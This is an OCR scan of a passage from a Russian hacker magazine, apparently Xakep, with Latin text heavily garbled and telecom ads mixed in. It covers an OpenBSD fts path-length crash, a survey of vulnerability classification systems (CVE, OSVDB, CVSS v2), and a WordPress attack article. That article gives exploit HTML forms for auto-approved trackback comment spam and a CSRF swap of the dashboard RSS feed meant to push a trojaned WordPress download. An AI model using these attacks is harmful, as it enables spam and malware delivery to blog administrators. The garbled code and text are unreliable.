зРгисР _РРзепР *РРз_сус1е; /* структура иерархии по 
циклу */ 

зРгисР зРаР *РРз_зРаРр; /* статистика по файлам 
иерархии */ 

} РТЗЕЫТ; 




НА И ИНТЕРНЕТ 



АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Заметим, что Й5_ІеѵеІ имеет тип збогЕ Это наводит на определен- 
ные мысли. При изучении кода взгляд натыкается на коммента- 
рий разработчиков: 

Ііпе-616-625 

/* 

* Рідиге оиР Рйе шах Рііе паше ІепдРй РйаР сап 
Ье зРогес! іп Рйе 

* сиггепР раРй -- Рйе іппег Іоор аІІосаРез 
шоге раРй аз песеззагу. 

* Ме геаііу члгоиісіп'р йаѵе Ро (іо Рйе шахіеп 
саісиіаріопз йеге, ѵ^е 

* соиісі сіо Рйет іп РРз_геасі ЬеРоге геРигпіпд 
Рйе раРй, ЬиР іР'з а 



Специальное предложение: 



ТРПРЙПН ИНТЕРНЕТ 

I Ь II Іі Ч* И П ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



* Подключение - в любом месте 
Москвы и Московской обл. 



* ІоР еазіег йеге зіпсе Рйе ІепдРй із рагР оР 
Рйе сіігепР зРгисРиге. 

* 

* ІР пор сйапдіпд сіігесРогіез зеР а роіпРег зо 
РйаР сап зизР аррепсі 

* еасй печл паше іпРо Рйе раРй. 

*/ 

Ііпе-616-625 

«По правде говоря, мы не будем здесь делать какие-либо вы- 
числения с огромными именами... и здесь должен быть уровень 
ограничений или «раіЫеп»- монитор». Конечно, должен, но где 
же он? Безусловно, недоработка, а точнее недоделка. 

#с!еРіпе ЫАРРЕЫБ (р ) \ 

(р->РРз_раРй [р->РРз_раРйіеп — 1] == ' / ' \ 

? р->РРз_раРйіеп — 1 : р->РРз_раРй!еп) 



* Срок подключения в Москве - 14 дней, 
в Московской обл. - от 14 до 30 дней. 

• Установка прямого московского телефонного номера 

• Многоканальные телефонные номера 

• ІР-телефония 

* Выделенные линии Интернет 



* Корпоративные частные сети (ѴРМ) 



Естественно, эта функция пойдет в креш, если мы обратимся к не- 
правильному участку памяти с помощью аномальных параметров. 

12 7 # ртлгсі 
/йоше/схіЬ 

# количество родительских каталогов очень велико 
12 7 # сіи /йоте/ 

4 /Йоше/схіЬ/ . ззй 

ЗедтепРаРіоп РаиІР (соге сіитресі) 

127# гт -гі ЗатоРпозс 
ЗедтепРаРіоп РаиІР (соге сіитресі) 

12 7 # сйтосі -К 0 00 ЗатоРпозс 
ЗедтепРаРіоп РаиІР (соге сіитресі) 



>> Тагде1в| 



• ОрепВЗй 4.4 (/изг/згс/іі Ь/ІіЬс/деп/ІРз.с) 

• М іеговой I піегіх 6.0 1 0.0.6030.0 х86 

• МісговЙ ѴізРа Епіегргіве (ЗеагсЫпбехег.ехе) ц-ц 



* Хостинг, услуги гіаіа-центра 



РМ Телеком 

шшш.гті.ги е-таіІ:1піо@гтйги {495} 988-8212 
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Приглашаем специалистов, имеющих 
опыт работы в области телекоммуникаций 






УЯЗВИМОСТИ 

КЛАССИФИКАТОРЫ И МЕТРИКИ КОМПЬЮТЕРНЫХ БРЕШЕЙ 

Ежедневно сотнями хакеров обнаруживаются тысячи уязвимостей, — после 
чего взламывается куча сайтов, и детали багов выкладываются в багтрак на 
всеобщее обозрение. Наверняка, ты читал подобные обзоры и замечал, что 
каждый баг определенным образом классифицируется. Что собой представ- 
ляет измерение уязвимости, по каким критериям производится и на кой 
черт это вообще нужно знать? Ответы ты найдешь в этой статье. 



«Общепринятых систем по классификации 
брешей в нашей стране не существует» - эту 

фразу я поставлю во главуугла. Продвинутым 
государством в этом плане стали США. Там 
ведут несколько классификаций и активно ис- 
пользуют их как в образовательном процессе, 
таки втехнологиях. Одной из самых известных 
систем классификации является СѴЕ, которая 
курируется компанией N050 (Ыабопаі СуЬег 
Зесигйу Оіѵізіоп] при одном из Министерств 
США. Рассмотрим эту систему подробнее. 

Н СѴЕ (СОММОЫ ѴШ.ЫЕКАВІЫТІЕ5 А№ 
ЕХР051ШЕ5) 

По сути, СѴЕ — это «словарь» известных уяз- 
вимостей, имеющий строгую характеристику 
по описательным критериям, что отличаетего, 
скажем, от Видітаск-ленты. Полностью СѴЕ 
можно отыскать в Национальной БазеУязви- 
мостей США (ЫѴО — пѵсІ.пізТдоѵ ] или на офи- 
циальном сайте [ сѵе.тйге.огд/сіаіа/сіоѵѵпіоасіз ]. 
Причем, распространяется база в нескольких 



форматах: хті, Ыті, сзб хзсі зсЬета. Из-за 
такой доступности, открытости и удобства к 
базе СѴЕ часто обращаются сами разработчики 
различного ПО (в первую очередь, нацеленного 
на рынокинформационной безопасности]. 
Общий вид записи СѴЕ выглядит примерно так: 

СѴЕ ІБ, КеТегепсе и БезсгірБіоп. 

Ю записывается суказанием кода и порядко- 
вого номера, например«СѴЕ-1999-03». В поле 
Пеіегепсе записываются различного рода 
ссылки на патчи, рекомендательного рода 
документы или комментарии разработчика. 
Оезсгірбоп отвечает за описание самой уязви- 
мости. Короче, СѴЕ — система широкого про- 
филя и никоим образом не сосредотачивается 
только на клиентскихуязвимостях или, скажем, 
исключительно на ѴѴЕВ-протоколе. Изначаль- 
но она задумывалась какединый стандарт 
идентификации уязвимостей, который должен 
охватывать несколько звеньев информацион- 



ной системы: систему поиска и обнаружения 
брешей (например, сканер безопасности], 
антивирусное ПО, а также исследуемое ПО. Как 
появилась идея ее создания? Многие компа- 
нии занимаются поиском брешей в различных 
продуктах на основе политики (не)разглашения 
информации и взаимодействия с производи- 
телями. Как-то, при исследовании одного из 
продуктов десятью различными компаниями, 
одной и той же уязвимости были присвоены 
абсолютно разные названия. После выявления 
сей вопиющей несправедливости было принято 
соглашение о едином стандарте. Тогда же ком- 
пания МІТПЕ Согрогайоп [ тИхе.огд ] предложи- 
ла решение, независимое от различных произ- 
водителей средств поиска уязвимостей, и взяла 
на себя ответственность за его воплощение. 
Нельзя сказать, что после этого все баги стали 
упорядоченными. Разработчики продолжают 
активно развивать самостоятельные начина- 
ния. Часть из них имеют платную подписку, и 
антивирусные компании частенько обращаются 
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к ним и добавляют соответствующие сигнатуры 
в свои продукты. Стоимость такой годовой под- 
писки составляет около $5000 и выше. 

н вш 

Эта классификация присутствует исключитель- 
но на портале Эесигііу^осиз (используется в 
ленте зесигіІуіюсиз.сот/ѵиІпегаЬіІіОез]. Одна 
из отличительных особенностей В Ю — сов- 
местимость с СѴЕ. Условно говоря, найденная 
уязвимость в ВЮ имеет ссылку на номер СѴЕ и, 
соответственно, равнозначна по информации. 

У системы есть ряд описательных свойств — 
например, класс, возможностьлокального или 
удаленного исполнения ит.п. В будущем ты 
убедишься, что этих параметров недостаточно 
для полной характеристики, но, тем не менее, 

В Ю дает разработчику вполне наглядную 
информацию о выявленной бреши. 

Н 05ѴБВ 

Название расшифровывается примерно как: 
«Открытая база данныхуязвимостей». Все 
просто и со вкусом. Классификация создана 
тремя некоммерческими организациями. Двести 
волонтеров со всего мира активно участвуют в 
ее наполнении. Среди прочего присутствуют: 
локация эксплуатации (сетевой доступ/локаль- 
ный доступ] и импакт (ущерб отуязвимости, 
воздействие на какую-либо часть целевой 
информационной системы). 



уже заработала себе достаточно славы. Не 
сказать, чтобы их портал внес какую-то особую, 
добавочную классификацию, но именно он 
предлагает услуги платной подписки на базу 
уязвимостей. 

Н 155 Х-РОКСЕ 

155 затрагивает все перечисленные выше кри- 
терии, но вдобавок описывает бизнес-им па кт, 
а именно — материальный ущерб, который 
может повлечь за собой угроза эксплуата- 
ции. Например, ба г « М ісгозобі; Ехсеі Ретоіе 
Собе Ехесиііоп», нацеленный на компьютер 
сотрудника банка или предприятия, способен 
привести к краже важных документов, ущерб 
от разглашения которых может исчисляться 
миллионами. О ценить урон от различных 
видов атакможно, ознакомившись с одним 
из ведущих блогов в русскоязычном сегмен- 
те о зесигбу-бричах и утечках — Регітеітіх 
( зесипМаЬ.ги/ЬІод/сотрапѵ/РептеІхіх Ыод ). 
Также в системе присутствует качественно 
новая черта — переход к метрикам безопас- 
ности для описания свойств уязвимости. Для 
этого используется общая система подсчета 
рисков уязвимостей СѴ55 версии 2. Она 
представляет собой шкалы, на основе которых 
выставляются баллы. Система метрик была 
придумана для разделения приоритетов над 
исправлением уязвимостей. Каждая шкала 



относится к определенному смысловому раз- 
делу, который называется метрикой. В СѴ55ѵ.2 
ихтри: базовая метрика, временная метрика 
и контекстная метрика. Хакеров заинтересует 
только первая. 

Н БАЗОВАЯ МЕТРИКА 

Нередко на солидных порталах по безопаснос- 
ти можно увидеть фразу — «СѴ55 Вазе 5соге = 
9.2». Какэто понимать? Параметр вычисляется 
по специальной формуле: 

ВазеЗсоге = гоипсі_Ьо_1_с1есіта1 ( ( ( 

О . 6*ІтрасС) + ( 0 . 4*Ехр1оіСаЪі1іЦу ) - 

1 . 5) ( ІтрасС) ) 

— плюс еще несколько. Все эти формулы можно 
найти по адресу 5 гзЕогд/сѵзз . Чтобы все стало 
понятнее, рассмотрим пример. Задан вектор 
уязвимости базовой метрики вида: «АѴ:І\І/ 

АС :Е/Аіі:І\І/С:І\І/І:І\І/А:С». Все красуется на 
странице описания, ноты абсолютно не мо- 
жешь расшифровать эти иероглифы! Я тебе 
помогу. Итак, расшифровываем по порядку. 
АссеззѴесІог: Меіѵѵогк — возможность доступа 
к объекту исключительно через сеть. Для экс- 
плуатации уязвимости злоумышленникдолжен 
обладать доступом к уязвимому ПО, причем этот 
доступ ограничен только величиной сетево- 
го стека. Локального доступа или доступа из 



Н 5ЕСІЖІА 

Эта датская компания, лента уязвимостей 
которой доступна по адресу зесипіа.сот . 



А Недокументированные 
уязвимости 

В настоящее время эксперты мозгуют над включением вектора 
«недокументированныеуязвимости» в одну из метрик. Этотпара- 
метр имеет высокое значение. В недалеком будущем мы сможем 
лицезреть строку ипбегсоѵег ѵиІпегабіІЛіез — «вероятно, возмож- 
ные кисполнению». На сайте, посвященном развитию метрик 
информационной безопасности ( зесигіб/теІхісз.огдЛіопіепДѴѴікі. 

| з р ) . вывешено публичное обращение по поводутого, как и каким 
образом исчислятьэтот параметр. Всежелающие могут отправить 
туда свои предложения. 

і 



А Политика разглашения 

информации ов уязвимости 

Это соглашение имеет ряд нюансов. Например, хакер, обнаружив 
уязвимость, ищет контакты, чтобы направить соответствующий 
запрос производителю. Если по истечении пяти дней производитель 
отмалчивается, вводит в заблуждение своих пользователей какими- 
то способами или некорректно вступает в диалог, то ему отправляется 
повторное письмо. Выжидаются еще пять рабочих дней, после чего 
баг-хантер вправе помещать описание о баге на собственном ресурсе 
или в публичные багтраки. При этом в письметребуется оговорить и 
согласовать дату публикации, чтобы производительуспел выпустить 
обновление или советы по защите от эксплуатации. Важно отметить, 
что если стороннее третье лицо опубликовало данные об эксплуа- 
тации найденнойтобойуязвимости.ты можешьсмело постить ее 
подробности без согласования с кем-либо. Воттакая арифметика. 

I 
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существует очень много видов систем и баз для учета уязвимостей. Мно- 
гие из них совместимы с СѴЕ 



ВЮуказываетлишь несколько характеристике свойствахуязвимости 





> ІП^О 

Истинные корни 
создания единой 
классификации 
багов и их конт- 
роля — это Ипіх 
Кпоѵѵп РгоЫет 
ЫзС ІпіегпаІБип 
Місгозузіетз Вид 
Ызі:, каталоги служб 
реагирования на 
компьютерные 
инциденты СЕКТ 
ранних версий. 



соседней сети нетребуется.Такиеуязвимости часто называют 
эксплуатируемыми удаленно. Примером такой сетевой атаки 
служит переполнение буфера РРС. 

АссеззСотрІехіІу: І_оѵѵ — сложность доступа к ресурсу: 
низкая. Для эксплуатации специальныхусловий и особых 
обстоятельств не требуется — все стандартно, шаблонно, 
общедоступно. 

АіЛЬепйсаІіоп: ІМопе — для эксплуатации не нужна автори- 
зация. Например, если бы это был сервис, который требует 
предварительной авторизации по какой-нибудь мудреной 
схеме (смарт-карты, ключи, токены], то значение этого 
вектора было бы другим. 

СопІчсіепІіаІИу Ітрасі: ІЧопе — влияние на разглашение 
критичной информации. I пЕед гі1:у ІтрасЕ ІЧопе — нару- 
шение целостности. Понятие «целостность» связано 
с достоверностью иточностью информации. Если быу 
злоумышленника была возможность модификации файлов, 
изменения области исполнения файлов, то мы бы постави- 
ли здесь С (полное) или Р (частичное, от«рагбаІ»]. 
АѵаіІаЬіІіІу Ітрасі: Сотріеіе — атаки, потребляющие про- 
пускную способность сети, циклы процессора или дисковое 
пространство, которые влияют на доступность системы. 

Если эксплуатация уязвимости вызывает отказ в обслужи- 
вании, то АѵаіІаЬіІЛу Ітрасі: имеетзначение «Сотріеію». 

И ВРЕМЕННАЯ МЕТРИКА 

Более глубоким анализом занимаются временные и 
контекстные метрики. Дело втом, что описанные векторы 
базовой метрики со временем не меняются. Они постоян- 
ны и могутхарактеризовать уязвимость по назначению и 
опасности. А какие критерии могут изменяться стечением 
времени? Представь, что ты нашел критическую уязвимость 



и уведомил разработчика. Временной интервал исправ- 
ления уязвимости в та ком случае имеетзначение, да и к 
томуже, сам изменяется во времени (это может быть день, 
час, либо производитель вообще никак не отреагирует]. 

Или ситуация, когда твой друг написал боевой эксплойт на 
недавнюю уязвимость «нулевого дня». Как долго этот код 
будет актуален? Он ускорит рискэксплуатации, следова- 
тельно, должен учитываться при ее описании. Доступна ли 
будет его технология кзавтрашнемудню? На все эти вопро- 
сы отвечают временные метрики. Рассмотрим некоторые их 
векторы. 

ЕхрІоіІаЬіІіІу (Е) — возможность эксплуатации. Пожалуй, 
один из важнейших критериев. Речь идет конкретно о 
доступности средства (кода, эксплойта, технологии], которое 
успешно работает. Важно учитывать и то, что доступный 
эксплойт можно использовать далеко не всегда. Исполь- 
зуемые описательные флаги: II (недоступен или непрове- 
рен), Ргооб-об-Сопсері: (РОС — опубликована наглядная 
демонстрация уязвимости], Р (функциональный, и рабочий 
эксплойтутебя в руках], Н («ЫдЬ гізк» всей темы, чаще 
всего характерен для червей или для уязвимостей с широко 
популярным описанием], N0 (без разницы, вектор метрики 
не влияет ни на что существенное, поэтомуучитывать его 
не надо]. Ретесііаііоп І_еѵеІ (РБ) — уровень исправления. 
Голосуязвимости услышал весь свет, воттолько как поступят 
разработчики? Порой они просто молчат, потому что ихуже 
не осталось в живых (простите, за цинизм и черный юмор), а 
иногда абсолютно сторонние организации и неофициальные 
источники начинаютзаботиться о безопасности на первый 
взгляд чужих продуктов и оперативно писать заплатки. 
Рерогі СопЯсіепсе (РС) — степень достоверности отчета. 
Сколько слухов и разговоров крутится вокруг! Банальный 
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На официальном сайте Национальной базы данныхуязвимостей 
есть возможность поиска по критериям СѴ55 




Если ты заметил, мы обращались к новой редакции СѴ55 (2). Существует 
еще и первая, облегченная версия, неучитывающая многих параметров. 
Тем не менее, она пригодна киспользованию и намного проще. Посчи- 
тать Вазе 5соге для нее можно с помощью сервиса на офсайте ЫѴБ 



пример: человек написал информацию якобы 
о рабочей критической уязвимости. А на деле 
оказалось, что это программный дефект и 
ничего существенного собой не представляет. 
Подтверждена ли уязвимость экспертами или 
же это просто проделки хакерских слухов? Ответ 
на этот вопрос даст вектор Рерогі Сопббепсе. 
Параметры всехуказанных векторов градиру- 
ются вариантами «да/нет/возможно». 

В КОНТЕКСТНАЯ МЕТРИКА 

Эти группы векторов отражают влияние на 
среду пользователя и изучают поведение 
после эксплуатации уязвимости. Как правило, 
метрика используется в качестве дополнения 
кбазовой. СоІІаІегаЮатаде Роіепііаі (СОР) 

— вероятность нанесения косвенного ущерба. 
Описываетэкономические илитехнические по- 
тери. Скажем, нам встретится уязвимость, при- 
водящая к ОоЭ-атаке. После ее эксплуатации 



часть сетевого оборудования перегревается, 
не справляясь с работой, и выходит из строя. Но 
при этом ущерб оказывается незначительным 
из-за низкой стоимости устройства и его распо- 
ложения (вне защищаемых и важных объектов]. 
Тагдеі ОізІгіЬіЛіоп (Ю) — плотность целей. 
Влияетли уязвимость только на одну цель, либо 
с ее помощью можно поработить огромное 
число машин? Если это стендовое показатель- 
ное выступление, лабораторный практикум или 
эксплуатация на машине, изолированной от 
других, то значение этого вектора равно нулю. 

Н ИСПОЛЬЗОВАНИЕ 
КЛАССИФИКАТОРОВ В СКАНЕРАХ 

Современные автоматизированные аудиторы 
п р и н ято зата ч и вать п од ка кую - л и бо ко н кретну ю 
базу знаний. Во-первых, это престижно, во-вторых 
— полезно. К примеру, при подготовке катгестации 
по одному из современных стандартов (ЫЕВС-СІР, 



РСІ, ЕІ5МА, СБВАили НІРАА] администратору пре- 
доста в л я ется воз м ожн ость п олу ч итьшаблонный 
отчет, соответствующий документу, издаваемому 
аудитором. Я встречал такое в современныхскане- 
рах беспроводной безопасности, типа АігМадпеІ, 
а также дорогих коммерческих сканерах вроде 155 
5есигіІу5саппег. Порой сканеры безопасности 
прибегаюткиспользованию собственного разде- 
ления брешей по Ю. Подобная практика применя- 
ется в Ыеззиз, который таки сменил лицензию на 
полукоммерческую. 

В ОТДЕЛЬНЫЕ КЛАССИФИКАЦИИ 

Подчас в Сети можно заметить абсолютно 
самопальные классификации, вроде Соттоп 
Сгкегіа ѴѴеЬ Арріісабоп 5есигі1;у 5согіпд 
(ССѴѴАР55] 1.1. Естественно, большого веса 
такая система не имеет, потому что составлять- 
ся она должна реальными экспертами, которые 
понимают суть проблемы. 

В ТАК ЛИ ОНО ВСЕ ВАЖНО? 

Безусловно, к делу следует подходить без фа- 
натизма. В первую очередь, подобные системы 
классификации нацелены на экспертное звено 
либо специалистов, которые заботятся о свое- 
временном устранении брешей. Но, на мой 
взгляд, каждый уважающий себя хакер должен 
знать и понимать общепринятые классифи- 
кации уязвимостей, разбираться в метриках и 
их векторах, чтобы четко и ясно представлять 
формулу оценки всех недавно взломанных им 
ресурсов, нс 



Список ^междоисоБной" совместимости 
систем классификаций 

СѴЕ: 155, ВЮ, 5есипіа, 5есигіІуТгаскег, 05ѴБВ 

В Ю: СѴЕ, Видіхад, 155, 5есипіа, 5есигіІуТгаскег, 05ѴБВ 

155: СѴЕ, ВЮ, 5есипіа, 5есигі1:уТгаскег, 05ѴБВ 

5есипіа: СѴЕ, 05ѴБВ 

СесигііуТгаскег: СѴЕ, 05ѴБВ, Ыеззиз 

Ыеззиз: СѴЕ, ВЮ, 05ѴБВ 

05ѴБВ: СѴЕ, ВЮ, 5есипіа, 5есигіІуТгаскег, 155, Ыеззиз, 5пог1: 
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АНДРЕЙ «БКѴ2» КОМАРОВ 

/ КОМАКОѴГаіЮЕРЕЫСЕ.РУ / 



ѴѴогсІРгезз: 

ТЕСТ 

НА ПРОНИКНОВЕНИЕ 



\Ѵ(ЖОРКЕ88 



ПОЛНЫЙ АНАЛИЗ МАЛОИЗВЕСТНЫХ УЯЗВИМОСТЕЙ РАСКРУЧЕННОГО ДВИЖКА 

ѴѴогЫРгев» — без преувеличения, самый популярный движок во всех «ин- 
тернетах» (по запросу «РоѵѵегесІ Ьу ѴѴогсІРгевв» Гугл выдает 74 400 000 
результатов!). Движок писался с расчетом на то, чтобы любая «домохозяй- 
ка» смогла им воспользоваться. Так и получилось: знаменитая «5-минутная 
установка», средства защиты от спама, визуальный редактор, зеоТгіепсИу 
ссылки и многие другие фичи сделали свое дело. Но все ли в порядке у этого 
великолепия с элементарной безопасностью? 



^ В предыдущих номерах ][ я уже не раз поднимал тему безопасности 

5 ѴѴоггіРгезз. Вкратце вернемся к пройденному и систематизируем твои 

о 

< знания. 

і и 

й Итак, последняя мало-мальски серьезная 501-инъекция была найдена 
в 2.2.2 версии движка 28 июля уже далекого 2007 года неким Аіехапсіег 
Сопсба (не повезло человеку с фамилией]. Не будем подробно на ней 
останавливаться, но если ты интересуешься историей, смотри ссылку на 
абѵізогу в сносках. 

Идем далее. Во всех версиях движка, до 2.3.3 версии включительно, 
присутствует Х55-уязвимость в модуле фильтрации Ыті кзез (вспом- 
нить о ней тебе поможет, например, январский номер журнала]. Уязви- 
мость можно было бы считать достаточно серьезной, если бы не одно 
но: админу надо нажать на ссылку с очень подозрительным адресом, что 
произойдет, только если админ — полный «чайник». 

Стоит упомянуть о нашумевшей в свое время уязвимости «Сбагзеі: 
Ретоіе 501 Іщесбоп» (версии <— 2.3.3), которую я считаю псевдо-уязви- 
мостью. Почему? Потому что в настройках блога искусственно должна 
быть выставлена кодировка Му50І_«СВК» либо « В I Ѳ 5 » . Атакого счаст- 
ливого совпадения я ни разу не встречал за всю свою многолетнюю 
практику работы с движком. 



Еще одна презабавнейшая бага — «ѴѴогбРгезз <=2.3.2 ‘хтігрс.рбр’ Розі; 
Ебй ОпаійЬогігесІ Ассезз ѴиІпегаЬіІйу» (читай о ней в одном из про- 
шлогодних «РАО ИпкесІ»], которая позволяет пользователям с правами 
«зиЬзсгібег» редактировать посты других пользователей. Все бы хоро- 
шо, если бы посты не сваливались в «бга11»,то есть — неопубликован- 
ные черновики. Такчто, оставим эту багу для истории. 

Говоря о 2.3.x ветке, нельзя не упомянуть о баге «ѴѴогсІРгезз ‘саП 
Рагатеіег 0 і гесЕогу Тгаѵегзаі Ѵиіпегабіійу», о которой я также расска- 
зывал в РАО. Бага удивительна своей простотой, но использование 
омрачаеттотфакт, что работает она только на ѴѴіпбоѵѵз-платформах. 
Последняя достойная внимания уязвимость — это «50Б Соіитп 
Тгипсабоп (Абтіп Такеоѵег]», почитать о которой ты сможешь в моей 
прошлогодней статье «Неслучайные числа». 

Замечу, что пользоваться ей крайне тяжело, ведь сгенерировать 
две га іпбоѵѵ таблицы по 40 и 80 Гб соответственно (ну, или подож- 
дать 2-4 дня], необходимых для работы эксплойта, не каждому под 
силу. 

«И это все?» — удивишься ты. Нет, дорогой читатель. Пришла пора 
рассказать тебе о не до конца описанных, малоизвестных, либо совсем 
неизвестных уязвимостях. 
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В Ж0Я0РКЕ55 С0ММЕЫТ5 НТМІ. 5 РАМ ѴШ.ЫЕКАВІЫТѴ 

Перед тобой первая неопубликованная уязвимость, которую я назвал 
«ѴѴогбРгезз Соттепіз Ніті 5рат Ѵиіпегабііііу». 

Уязвимость затрагивает все версии движка, начиная от 1 .5 и заканчивая 
последней (на момент написания статьи] 2.7.1 . 

Заглянем в исходники вордпресса. Открывай файл ./ѵѵр-іпсіисіез/ 
соттепЬрЬр и находи следующий код: 

ТипсЬіоп скеск_соттепЬ ( $аикког , $етаі 1 , $иг 1 , $001x111101111, 
$изег_ір, $изег_адепЬ, $соттепЬ_Ьуре) { 

іТ ( 'ЬгаскЪаск' == $соттепЬ_Ьуре I I 'ріпдЬаск' = = 
$согптепЬ_ 1 :уре ) { // скеск ІТ йотаіп із іп Ыодгоіі 
$игі = рагзе_иг 1 ( $иг 1 ) ; 

$с!отаіп = $игі [ ’козЬ ' ] ; 

$игі = рагзе_иг1 ( дек_оркіоп ( 'коте' ) ) ; 
$коте_йотаіп = $игі [ ’козЬ ' ] ; 
і Т ( $щрс1Ъ- >дек_ѵаг ( $ѵ\хрсПэ- >ргераге ( " ЗЕЬЕСТ 
1іпк_і(і ЕКОМ $ѵтрс!Ъ->1іпкз ШНЕКЕ 1іпк_иг1 ЫКЕ (%з) ЬІМІТ 
1" , ' % ' . $с!отаіп. ' % ' ) ) II $с!отаіп == $коте_сіотаіп ) 
геСигп Ьгие; 
еізе 

геЬигт: Таізе; 

} 



$зкг = тЪ_зЬгсиЬ ( $зЬг, 0, $соипЬ ); 

// гетоѵе рагЬ оТ ап епкіру ак Рке епй 

$зРг = ргед_гер1асе ( ' /& [ л ; \з ] { 0 , 6 } $/ ' , '', $зРг ) ; 

геРигп $ з Р г ; 

} 

Казалось бы, передать ссылку здесь невозможно. Но нерадивые разра- 
ботчики снова неучли несколько нюансов: 

1 . з1;гір_1;адз(] успешно пропускает через себя теги вроде «<Ьг/>» (то есть, 
содержащие пробелы); 

2. кзез-фильтры успешно нормализуют Ы:тІ-теги, содержащие в себе 
эти самые пробелы. 

Исходя из этой информации, можно придумать конечный эксплойт: 

<кРш1> 

<Рогт асРіоп= "кРРр : //Іатег . сот/ѵтр/ѵгр-РгаскЬаск . 
ркр?р= [ ІБ_ПОСТА] " шеРко<5= "розР " > 

Тайтл: <іприР пате=»РіРІе» ѵа1ие= " соттепРег " /><Ьг/> 

ІЖЬ : сіприР паше="иг1" ѵа1ие="кРРр : //%/1а. сот" /><Ьг/> 
СоттепР : <іприР пате= " ехсегрр " ѵа1ие= " " /><Ьг/> 

<іприР пате= "Ыод_пате" ѵа1ие=»ВІод" /><Ьг/> 

<іприР Руре= " зиЬтіР " ѵа1ие="ок"/> 

</ Рогт> 

</кРт!> 



} 

В чем смысл этого кода? 

1. Блог«смотрит» на ИПІ-трэкбека, парситего с помощью рагзе_игІ (под- 
робно отом, что такое ТгаскЬаск, смотри в моей прошлогодней статье 
«Спамом по вебу»]. 

2. Если хосттрэкбэка присутствует в блогролле (сборникссылок на твоем 
блоге), то функция сЬеск_соттепШ вернетігие. 

3. Если комментарий успешно проходит через сНеск_соттеп1:(], то 
сразу начинает отображаться под постом. Ежели нет — должен пройти 
премодерацию. 

В этом занимательном коде есть один нюанс. Разработчики ѴѴогбРгезз 
просто-напросто не знают, как работает функция рагзе_игІ. 

Цитата с ЬирУ/ѵѵѵѵѵѵ.рЬр.пеі/рагзе игЕ «ТЬізішпсбоп із поі плеапИо 
ѵаіісіаіе іЬе діѵеп ИРЕ». 

Эти слова подразумевают, что рагзе_игІ() элементарно не проверяет 
валидность переданного адреса! Мы можем передать в нее что-то вроде 
«Ьир://%/зиск_ѵѵогбрге55», в результате чего переменная $игіГбозЕ] 
станет равной «%». 

Далее, какты уже догадался, наш еѵіі-хост переместится в зді-запрос, 
который примет следующий ВИД: 

"ЗЕЬЕСТ 1іпк_ісІ ЕКОМ мр_1іпкз ШНЕКЕ 1іпк_иг1 ЫКЕ '%%%' 
ЫМІТ 1" 

Так ка к этот запрос всегда будет возвращать Іхце, наш спам-коммента- 
рий априори будет считаться зааппрувленным :). 

Но и это еще не все! Для работы стрекбеком используется файл ,/ѵѵр- 
ІхаскЬаск.рЬр, в котором нашетело комментария ($ехсегр1:] попадает в 
такую функцию: 

ІипсЫоп ѵф_кЬт1_ехсегрЬ ( $зкг, $соипк ) { 

$зЬг = зкгір_Ьадз ( $зкг ) ; 



Где в поле «Соттепі» вставляем: 

< Ь >< а кгеІ = "кЬЬр" / /у а . ги" >Купить слона< / а >< / Ь > 

В итоге, на нужном блоге мы получим зааппрувленный комментарий с 
выделенной жирной ссылкой «Купить слона». Единственное замечание: 
этот способ в 5Е0 годен только для Ѵабоо, Яндекса, М5ІЧ, так как в коде 
ссылки добавляется геІ=«по1юио\л/», благодаря чему всемогущий Гугл ее 
не засчитывает. 

Н ПОДМЕНА К55-ФИД0В В 0А5НВ0АК0 

В конце прошлого года я нашел еще один занимательный баг в 
ѴѴогбРгезз, который заключался в подмене В55-лент на главной страни- 
це админки блога. Итак, в ОазЬЬоагб содержатся следующие ленты но- 
востей: новости плагинов, іпсотіпд Ііпкз, новости беѵЫод с ѵѵогбргезз. 
огд и новости «Планеты ѴѴогбРгезз». Начиная с версии 2.5, к каждому 
фиду прикреплена кнопочка «Есііі», что позволяет администратору блога 
редактировать эти пресловутые фиды, заменяя их на любые свои. Но 
разработчики снова проморгали тот факт, что в функции редактирования 
фидов не существует ни какой проверки прав (в который раз поража- 
юсь невнимательности девелоперов]. Теперь смотри. Скопируй ленту 
новостей с девблога официального сайта вордпресса, затем вставь в 
нее в качестве первого поста объявление о зесигТу-патче (или просто 
новой версии] блога. В посте (естественно, в ссылке на скачку] укажи 
свой протрояненный дистрибутив вордпресса. Затем положи подго- 
товленный фид на какой-нибудь сервер и используй этот Ыті-коддля 
подмены рсс-ленты девблога на свою: 

<Тогт асЬіоп= "кЬЬр : //Іатег. сот/ѵтр2б5/ѵтр-асЗтіп/ " 
теккос1= "розЬ " > 

<іприЬ пате= 'ЫійдеЬ-гзз [1] [игі] " Ьуре="ЬехЬ" 
ѵа1ие= "кЬЬр : / /ссылка_на_наш_еѵі1гзз . сот/ Теей. хті " /> 
<іприЬ пате= "хлхійдеЬ-гзз [1] [ЫЫе] " Ьуре="ЬехЬ" 
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Генерация таблицдля асітіп Іакеоѵегот Электа 




> Ііпкз 



• ѵѵогсІрге55.огд/ 
сіоѵѵпіоасі/геіеазе- 
агсЬіѵе/ — архив 
релизов ѴѴогсІРгезз. 

• тіІѵѵОгпп.сопп/ 
ехрІоіІз/4721 — 
Сбагзеі: Ретоіе 
506 Іщесбоп 
ѴиІпегаЬіІку. 

• Ьиауасогр.сот/ 
біез/ѵѵогсіргезз/ 
ѵѵогсіргезз-зді- 
іщесбоп-асіѵізогу. 
Ыт[ — Ретоіе 
506 Іщесбоп іп 
ѴѴогсІРгезз ап сі 
ѴѴогсІРгезз МУ. 

• 

сот/ЬісІ/27669 

— ѴѴогсІРгезз 

1 хтігрс.рбр 1 Ро5І 
Есііі: ипаіЛбогкесІ 
Ассезз ѴиІпегаЬіИГу. 

• зесигіЫосиз. 
сот/ЬісІ/28845 

— ѴѴогсІРгезз 

1 саМ Рагате1:ег 
Оі гесГогу Тгаѵегзаі 
ѴиІпегаЬіІіМ. 




Эксплойт для баги с сгеаіе^ипсбоп 

ѵа1ие= "Заголовок рсс" /> 

<іприк пате= "міеідек-гзз [1] [ікетз] " 
ѵа1ие= " сколько показывать постов в рсс" /> 
<іприк пате= "міеідек-гзз [1] [ зком_зиттагу ] " 
Суре=" сМескЬох" ѵа1ие="1" скескес1= " скескесі" /> 
<іприк пате="ѵ\ыс1дек-гзз [1] (зЬ.оѵ*_аикЬ.ог] " 
куре=" скескЬох» ѵа1ие=" 1" /> 

<іприк пате= "міеідек-гзз [1] [ зЬоот_сіаке] " 
куре= " скескЬох" ѵа1ие="1" скескес1= " скескесі" /> 
<іприк куре= "кіекіеп" пате= "міеідек-гзз [1] 
[зиЪтік] " ѵа1ие="1" /> 

